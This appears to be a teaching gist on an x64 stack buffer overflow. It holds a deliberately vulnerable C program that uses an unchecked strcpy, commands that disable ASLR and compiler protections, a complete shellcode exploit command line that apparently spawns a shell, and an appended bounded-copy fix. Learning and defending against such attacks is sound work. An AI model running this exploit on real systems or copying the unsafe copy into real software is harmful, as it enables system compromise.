@jackbergus
Last active May 4, 2021 13:00
An example of a Buffer Overflow Attack for x64 architectures.
/*
* vuln2.c
* This file is part of bufovattack
*
* Copyright (C) 2021 - Giacomo Bergami
*
* bufovattack is free software; you can redistribute it and/or modify
* it under the terms of the GNU General Public License as published by
* the Free Software Foundation; either version 2 of the License, or
* (at your option) any later version.
*
* bufovattack is distributed in the hope that it will be useful,
* but WITHOUT ANY WARRANTY; without even the implied warranty of
* MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the
* GNU General Public License for more details.
*
* You should have received a copy of the GNU General Public License
* along with bufovattack. If not, see <http://www.gnu.org/licenses/>.
*/
// In order to disable ASLR, first run the following commands:
// $ sudo su
// # echo 0 > /proc/sys/kernel/randomize_va_space
//
// ASLR (Address Space Layout Randomization) is a measure that hinders exploitation of memory corruption vulnerabilities.
// ASLR randomly arranges the address space positions of key data areas of a process, including the base of the executable and the positions of the stack, heap and libraries.
// By doing so, it makes it harder for an attacker to exploit a buffer overflow.
/** Compile with gcc -fno-stack-protector -z execstack -no-pie vuln2.c -o vuln2 -g
 *
 * -fno-stack-protector = disables the canary check that detects overwriting of the activation record (stack frame) of a function.
 *   This removes the "stack smashing detected" abort while running the code; the overflow then ends in a Segmentation Fault instead!
 * -z execstack = makes the stack executable
 * -no-pie = disables PIE; PIE is a precondition for randomizing the executable's base address under ASLR
 * -g = emits debug information
 *
 */
//
// Use PEDA for a better experience in GDB while dealing with address space corruption: https://github.com/longld/peda
// In GDB, run it as follows: /home/giacomo/buff_dump/vuln2 $(python2 -c 'print "\x90"*450+"\x31\xc0\x48\xbb\xd1\x9d\x96\x91\xd0\x8c\x97\xff\x48\xf7\xdb\x53\x54\x5f\x99\x52\x57\x54\x5e\xb0\x3b\x0f\x05"+"\x41"*43+"b"*6')
// The activation record containing the value rsp is then copied to the rsb
// Then, this shows the region where the address was written: x/200x $rsp
// Look for an address where there are NOPs, like 0x9090909090909090. Then, use the part that follows...
// Run with ./vuln2 $(python2 -c 'print "\x90"*450+"\x31\xc0\x48\xbb\xd1\x9d\x96\x91\xd0\x8c\x97\xff\x48\xf7\xdb\x53\x54\x5f\x99\x52\x57\x54\x5e\xb0\x3b\x0f\x05"+"\x41"*43+"\xf0\xe1\xff\xff\xff\x7f"'),
// where the final six bytes are the target address written in little-endian order, i.e. from right to left, one byte at a time
#include <stdio.h>
#include <string.h>

int main(int argc, char* argv[]) {
    char buf[512];
    strcpy(buf, argv[1]);   /* unchecked copy: argv[1] longer than 511 bytes overruns buf */
    return 0;
}
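A bounded-copy counterpart to vuln2.c, added here as an example and not part of the gist: it keeps the same 512-byte stack buffer but refuses any argv[1] that would not fit, so an oversized argument is reported instead of overwriting the saved return address. The `copy_status` enum, `process_arg` and the `process_run_of_a` test helper are names of my own.

```c
#include <stdio.h>
#include <string.h>

#define BUF_SIZE 512   /* same stack buffer size as vuln2.c */

enum copy_status { COPY_OK = 0, COPY_TOO_LONG = 1, COPY_BAD_ARG = 2 };

/* Bounded replacement for the unchecked strcpy() in vuln2.c.
 * The copy happens only if src, including its NUL terminator, fits in dst;
 * otherwise nothing is written and the caller is told why. */
static enum copy_status copy_arg_bounded(char *dst, size_t dst_size, const char *src)
{
    if (dst == NULL || src == NULL || dst_size == 0)
        return COPY_BAD_ARG;
    /* Look for the terminator within the first dst_size bytes only, so the
     * scan never reads further into src than we could store. */
    const char *nul = memchr(src, '\0', dst_size);
    if (nul == NULL)
        return COPY_TOO_LONG;                      /* would overrun dst */
    memcpy(dst, src, (size_t)(nul - src) + 1);     /* +1 copies the NUL */
    return COPY_OK;
}

/* Same shape as main() in vuln2.c, with the bounded copy in place of strcpy(). */
static enum copy_status process_arg(const char *arg)
{
    char buf[BUF_SIZE];
    return copy_arg_bounded(buf, sizeof buf, arg);
}

/* Constructed input for testing: a run of n 'A' bytes standing in for argv[1],
 * the same filler byte the page's command line uses. */
static enum copy_status process_run_of_a(size_t n)
{
    char sample[1024];
    if (n >= sizeof sample)
        return COPY_BAD_ARG;
    memset(sample, 'A', n);
    sample[n] = '\0';
    return process_arg(sample);
}

int main(int argc, char *argv[])
{
    enum copy_status st = (argc > 1) ? process_arg(argv[1]) : COPY_BAD_ARG;
    if (st != COPY_OK)
        fprintf(stderr, "rejected (status %d): argument missing or too long\n", (int)st);
    return st == COPY_OK ? 0 : 1;
}
```

Run it with the same 500-plus-byte argument as vuln2 and it exits with status 1 instead of crashing; the compile flags on the page (stack protector, PIE, non-executable stack) remain worth keeping on top of this, since they catch the overruns a bounds check misses.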